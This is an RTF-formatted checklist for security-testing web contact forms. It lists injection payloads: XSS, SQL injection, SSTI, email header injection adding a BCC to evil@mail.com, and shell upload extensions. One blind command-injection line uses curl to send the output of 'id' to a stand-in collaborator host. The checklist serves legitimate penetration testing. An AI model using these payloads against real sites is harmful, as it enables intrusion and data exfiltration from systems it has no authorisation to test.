{\rtf1\ansi\ansicpg1252\cocoartf2759
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\froman\fcharset0 Times-Roman;\f1\froman\fcharset0 Times-Bold;\f2\fmodern\fcharset0 Courier;
}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red109\green109\blue109;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\cssrgb\c50196\c50196\c50196;}
\paperw11900\paperh16840\margl1440\margr1440\vieww15620\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs24 \cf0 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Contact Form Security Testing Checklist\
\
1. 
\f1\b \strokec2 Input Validation & Injection\
\'97 XSS (stored/reflected) : 
\f0\b0 \strokec2 <script>alert(1)</script>. \
\'97 Blind XSS : https://bxsshunter.com/\
\'97 DOM-based XSS : "><img src=x onerror=alert(1)>\
\'97 SQL Injection : 
\f2\fs26 \strokec2 ' OR '1'='1
\f0\fs24 \strokec2  in 
\f2\fs26 \strokec2 Email\
\'97 SQL Injection (blind) : ' OR IF(SLEEP(5),1,0)-- \
\'97 
\f0\fs24 \strokec2 Command Injection : ; ls\
\'97 Command Injection (Blind) : 
\f2\fs26 \strokec2 ; curl https://your-burp-collaborator.com/$(id)
\f0\fs24 \strokec2  in
\f2\fs26 \strokec2 Phone
\f0\fs24 \strokec2 \
\'97 SSTI :  \{\{7*7\}\} $\{7*7\}\
\
\pard\pardeftab720\partightenfactor0
\cf0 2. 
\f1\b \strokec2 Business Logic Flaws
\f0\b0 \strokec2 \
\pard\pardeftab720\partightenfactor0
\cf0 Mandatory Field Bypass : Send request without 
\f2\fs26 \strokec2 Email
\f0\fs24 \strokec2  or 
\f2\fs26 \strokec2 Phone\

\f0\fs24 \strokec2 Spam / Rate Limiting : Send 1000+ requests with same input\
Duplicate Lead Generation : Submit same data repeatedly\
\
3. 
\f1\b \strokec2 Information Disclosure\

\f0\b0 \strokec2 Verbose Error Handling : Break email format (
\f2\fs26 \strokec2 test@@mail..com\

\f0\fs24 \strokec2 Email Injection : 
\f2\fs26 \strokec2 attacker@mail.com\\r\\nBCC:evil@mail.com
\f0\fs24 \strokec2  in 
\f2\fs26 \strokec2 Email\
\

\f0\fs24 \strokec2 5. 
\f1\b \strokec2 File Upload (if any hidden upload option)\

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth2253\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf0 \strokec2 \'97 Maliciousupload : 
\f2\b0\fs26 \strokec2 php
\f0\fs24 \strokec2 , 
\f2\fs26 \strokec2 .jsp
\f0\fs24 \strokec2 , 
\f2\fs26 \strokec2 .aspx
\f0\fs24 \strokec2  \
\
6.  CORS Misconfig :  Add origin header \
\cell \lastrow\row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth4945\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf0 \cell \lastrow\row
}